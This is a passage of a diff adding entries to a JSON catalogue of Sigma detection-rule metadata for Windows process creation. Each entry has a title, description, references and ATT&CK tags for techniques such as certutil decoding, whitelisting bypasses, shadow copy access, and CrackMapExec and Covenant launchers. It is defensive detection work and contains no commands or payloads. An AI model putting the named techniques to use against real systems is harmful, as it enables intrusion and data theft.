"aaf46cdc-934e-4284-b329-34aa701e3771", + "value": "Application Whitelisting Bypass via Bginfo", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", + "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bginfo.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ], + "creation_date": "2019/10/26", + "filename": "proc_creation_win_susp_bginfo.yml", + "author": "Beyu Denis, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects transferring files from system on a server bitstransfer Powershell cmdlets", + "uuid": "cd5c8085-4070-4e22-908d-a5b3342deb74", + "value": "Suspicious Bitstransfer via PowerShell", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bitstransfer.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.persistence", + "attack.t1197" + ], + "creation_date": "2021/08/19", + "filename": "proc_creation_win_susp_bitstransfer.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of a set of builtin commands often used in recon stages by different attack groups", + "uuid": "2887e914-ce96-435f-8105-593937e90757", + "value": "Reconnaissance Activity Using BuiltIn Commands", + "meta": { + "refs": [ + "https://twitter.com/haroonmeer/status/939099379834658817", + "https://twitter.com/c_APT_ure/status/939475433711722497", + "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_builtin_commands_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" + ], + "creation_date": "2018/08/22", + "filename": "proc_creation_win_susp_builtin_commands_recon.yml", + "author": "Florian Roth, Markus Neis", + "level": "medium", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", + "uuid": "737e618a-a410-49b5-bec3-9e55ff7fbc15", + "value": "Suspicious Calculator Usage", + "meta": { + "refs": [ + "https://twitter.com/ItsReallyNick/status/1094080242686312448", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_calc.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "creation_date": "2019/02/09", + "filename": "proc_creation_win_susp_calc.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Launch 64-bit shellcode from a debugger script file using cdb.exe.", + "uuid": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", + "value": "Possible App Whitelisting Bypass via WinDbg/CDB as a Shellcode Runner", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/", + "http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html", + "https://twitter.com/nas_bench/status/1534957360032120833", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cdb.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1218", + "attack.t1127" + ], + "creation_date": "2019/10/26", + "filename": "proc_creation_win_susp_cdb.yml", + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of debugging tools" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code", + "uuid": "e011a729-98a6-4139-b5c4-bf6f6dd8239a", + "value": "Suspicious Certutil Command Usage", + "meta": { + "refs": [ + "https://twitter.com/JohnLaTwC/status/835149808817991680", + "https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/", + "https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/", + "https://twitter.com/egre55/status/1087685529016193025", + "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.command_and_control", + "attack.t1105", + "attack.s0160", + "attack.g0007", + "attack.g0010", + "attack.g0045", + "attack.g0049", + "attack.g0075", + "attack.g0096" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_certutil_command.yml", + "author": "Florian Roth, juju4, keepwatch", + "level": "high", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious a certutil command that used to encode files, which is sometimes used for data exfiltration", + "uuid": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", + "value": "Certutil Encode", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", + "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_encode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2019/02/24", + "filename": "proc_creation_win_susp_certutil_encode.yml", + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.", + "uuid": "e0552b19-5a83-4222-b141-b36184bb8d79", + "value": "Obfuscated Command Line Using Special Unicode Characters", + "meta": { + "refs": [ + "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_char_in_cmd.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2022/01/15", + "filename": "proc_creation_win_susp_char_in_cmd.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", + "uuid": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", + "value": "Suspicious Child Process Created as System", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", + "https://github.com/antonioCoco/RogueWinRM", + "https://twitter.com/Cyb3rWard0g/status/1453123054243024897", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1134.002" + ], + "creation_date": "2019/10/26", + "filename": "proc_creation_win_susp_child_process_as_system_.yml", + "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", + "uuid": "4b046706-5789-4673-b111-66f25fe99534", + "value": "Overwrite Deleted Data with Cipher", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cipher.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ], + "creation_date": "2021/12/26", + "filename": "proc_creation_win_susp_cipher.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious process that use escape characters", + "uuid": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", + "value": "Suspicious Commandline Escape", + "meta": { + "refs": [ + "https://twitter.com/vysecurity/status/885545634958385153", + "https://twitter.com/Hexacorn/status/885553465417756673", + "https://twitter.com/Hexacorn/status/885570278637678592", + "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", + "http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_escape.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ], + "creation_date": "2018/12/11", + "filename": "proc_creation_win_susp_cli_escape.yml", + "author": "juju4", + "level": "low", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of a CLSID folder name located in a suspicious location from the commandline as seen being used in IcedID", + "uuid": "90b63c33-2b97-4631-a011-ceb0f47b77c3", + "value": "Suspicious CLSID Folder Name In Suspicious Locations", + "meta": { + "refs": [ + "https://twitter.com/Kostastsale/status/1565257924204986369", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_clsid_foldername.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2022/09/01", + "filename": "proc_creation_win_susp_clsid_foldername.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Some FP is expected with some installers" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", + "uuid": "178e615d-e666-498b-9630-9ed363038101", + "value": "Suspicious Elevated System Shell", + "meta": { + "refs": [ + "https://github.com/Wh04m1001/SysmonEoP", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/12/05", + "filename": "proc_creation_win_susp_cmd.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement.", + "uuid": "e31f89f7-36fb-4697-8ab6-48823708353b", + "value": "Suspicious Cmd Execution via WMI", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_exectution_via_wmi.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ], + "creation_date": "2022/09/27", + "filename": "proc_creation_win_susp_cmd_exectution_via_wmi.yml", + "author": "Tim Rauch", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", + "uuid": "1ac8666b-046f-4201-8aba-1951aaec03a3", + "value": "Command Line Execution with Suspicious URL and AppData Strings", + "meta": { + "refs": [ + "https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100", + "https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_http_appdata.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_cmd_http_appdata.yml", + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "level": "medium", + "falsepositive": [ + "High" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a copy execution that targets a shadow copy (sometimes used to copy registry hives that are in use)", + "uuid": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", + "value": "Copy from Volume Shadow Copy", + "meta": { + "refs": [ + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ], + "creation_date": "2021/08/09", + "filename": "proc_creation_win_susp_cmd_shadowcopy_access.yml", + "author": "Max Altgelt, Tobias Michalski", + "level": "medium", + "falsepositive": [ + "Some rare backup scenarios" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects use of chcp to look up the system locale value as part of host discovery", + "uuid": "7090adee-82e2-4269-bd59-80691e7c6338", + "value": "CHCP CodePage Locale Lookup", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1614.001" + ], + "creation_date": "2022/02/21", + "filename": "proc_creation_win_susp_codepage_lookup.yml", + "author": "_pete_0, TheDFIRReport", + "level": "high", + "falsepositive": [ + "During Anaconda update the 'conda.exe' process will eventually launch the command described in the detection section" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a code page switch in command line or batch scripts to a rare language", + "uuid": "c7942406-33dd-4377-a564-0f62db0593a3", + "value": "Suspicious Code Page Switch", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers", + "https://twitter.com/cglyer/status/1183756892952248325", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_switch.yml" + ], + "tags": [ + "attack.t1036", + "attack.defense_evasion" + ], + "creation_date": "2019/10/14", + "filename": "proc_creation_win_susp_codepage_switch.yml", + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "level": "medium", + "falsepositive": [ + "Administrative activity (adjust code pages according to your organisation's region)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion", + "uuid": "2c0d2d7b-30d6-4d14-9751-7b9113042ab9", + "value": "Suspicious Characters in CommandLine", + "meta": { + "refs": [ + "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_commandline_chars.yml" + ], + "tags": "No established tags", + "creation_date": "2022/04/27", + "filename": "proc_creation_win_susp_commandline_chars.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools", + "uuid": "50d66fb0-03f8-4da0-8add-84e77d12a020", + "value": "Suspicious RunAs-Like Flag Combination", + "meta": { + "refs": [ + "https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_command_flag_pattern.yml" + ], + "tags": "No established tags", + "creation_date": "2022/11/11", + "filename": "proc_creation_win_susp_command_flag_pattern.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious command line arguments of common data compression tools", + "uuid": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", + "value": "Suspicious Compression Tool Parameters", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1184067445612535811", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_compression_params.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ], + "creation_date": "2019/10/15", + "filename": "proc_creation_win_susp_compression_params.yml", + "author": "Florian Roth, Samir Bousseaden", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the conhost execution as parent process. Can be used to evaded defense mechanism.", + "uuid": "7dc2dedd-7603-461a-bc13-15803d132355", + "value": "Conhost Parent Process Executions", + "meta": { + "refs": [ + "http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_conhost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2020/10/25", + "filename": "proc_creation_win_susp_conhost.yml", + "author": "omkar72", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "ForceV1 asks for information directly from the kernel space. Conhost connects to the console application", + "uuid": "3037d961-21e9-4732-b27a-637bcc7bf539", + "value": "Suspicious Conhost Legacy Option", + "meta": { + "refs": [ + "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29", + "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_conhost_option.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2022/04/04", + "filename": "proc_creation_win_susp_conhost_option.yml", + "author": "frack113", + "level": "informational", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious process pattern found in CVE-2021-40444 exploitation", + "uuid": "894397c6-da03-425c-a589-3d09e7d1f750", + "value": "CVE-2021-40444 Process Pattern", + "meta": { + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444", + "https://twitter.com/neonprimetime/status/1435584010202255375", + "https://www.joesandbox.com/analysis/476188/1/iochtml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_cve_2021_40444.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2021/09/08", + "filename": "proc_creation_win_susp_control_cve_2021_40444.yml", + "author": "@neonprimetime, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", + "uuid": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", + "value": "Suspicious Control Panel DLL Load", + "meta": { + "refs": [ + "https://twitter.com/rikvduijn/status/853251879320662017", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_dll_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2017/04/15", + "filename": "proc_creation_win_susp_control_dll_load.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious copy command to or from an Admin share or remote", + "uuid": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", + "value": "Copy from Admin Share", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1211636381086339073", + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.collection", + "attack.exfiltration", + "attack.t1039", + "attack.t1048", + "attack.t1021.002" + ], + "creation_date": "2019/12/30", + "filename": "proc_creation_win_susp_copy_lateral_movement.yml", + "author": "Florian Roth, oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Administrative scripts" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n", + "uuid": "fff9d2b7-e11c-4a69-93d3-40ef66189767", + "value": "Suspicious Copy From or To System32", + "meta": { + "refs": [ + "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120", + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ], + "creation_date": "2020/07/03", + "filename": "proc_creation_win_susp_copy_system32.yml", + "author": "Florian Roth, Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (update)", + "level": "medium", + "falsepositive": [ + "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", + "When cmd.exe and xcopy.exe are called directly", + "When the command contains the keywords but not in the correct order" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious command lines used in Covenant luanchers", + "uuid": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", + "value": "Covenant Launcher Indicators", + "meta": { + "refs": [ + "https://posts.specterops.io/covenant-v0-5-eee0507b85ba", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_covenant.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1059.001", + "attack.t1564.003" + ], + "creation_date": "2020/06/04", + "filename": "proc_creation_win_susp_covenant.yml", + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect various execution methods of the CrackMapExec pentesting framework", + "uuid": "058f4380-962d-40a5-afce-50207d36d7e2", + "value": "CrackMapExec Command Execution", + "meta": { + "refs": [ + "https://github.com/byt3bl33d3r/CrackMapExec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.t1053", + "attack.t1059.003", + "attack.t1059.001", + "attack.s0106" + ], + "creation_date": "2020/05/22", + "filename": "proc_creation_win_susp_crackmapexec_execution.yml", + "author": "Thomas Patzke", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", + "uuid": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "value": "CrackMapExec Command Line Flags", + "meta": { + "refs": [ + "https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local", + "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", + "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz", + "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/25", + "filename": "proc_creation_win_susp_crackmapexec_flags.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", + "uuid": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "value": "CrackMapExec PowerShell Obfuscation", + "meta": { + "refs": [ + "https://github.com/byt3bl33d3r/CrackMapExec", + "https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027.005" + ], + "creation_date": "2020/05/22", + "filename": "proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml", + "author": "Thomas Patzke", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "uuid": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", + "value": "Suspicious Parent of Csc.exe", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1094924091256176641", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.defense_evasion", + "attack.t1218.005", + "attack.t1027.004" + ], + "creation_date": "2019/02/11", + "filename": "proc_creation_win_susp_csc.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse Visual Basic (VB) for execution", + "uuid": "23250293-eed5-4c39-b57a-841c8933a57d", + "value": "Cscript Visual Basic Script Execution", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.005/T1059.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cscript_vbs.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005" + ], + "creation_date": "2022/01/02", + "filename": "proc_creation_win_susp_cscript_vbs.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. AppData)", + "uuid": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", + "value": "Suspicious Csc.exe Source File Folder", + "meta": { + "refs": [ + "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/", + "https://twitter.com/gN3mes1s/status/1206874118282448897", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.004" + ], + "creation_date": "2019/08/24", + "filename": "proc_creation_win_susp_csc_folder.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897", + "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of the lesser known remote execution tool named CsExec (a PsExec alternative)", + "uuid": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "value": "CsExec Remote Execution Tool Usage", + "meta": { + "refs": [ + "https://github.com/malcomvetter/CSExec", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csexec.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001", + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2022/08/22", + "filename": "proc_creation_win_susp_csexec.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter 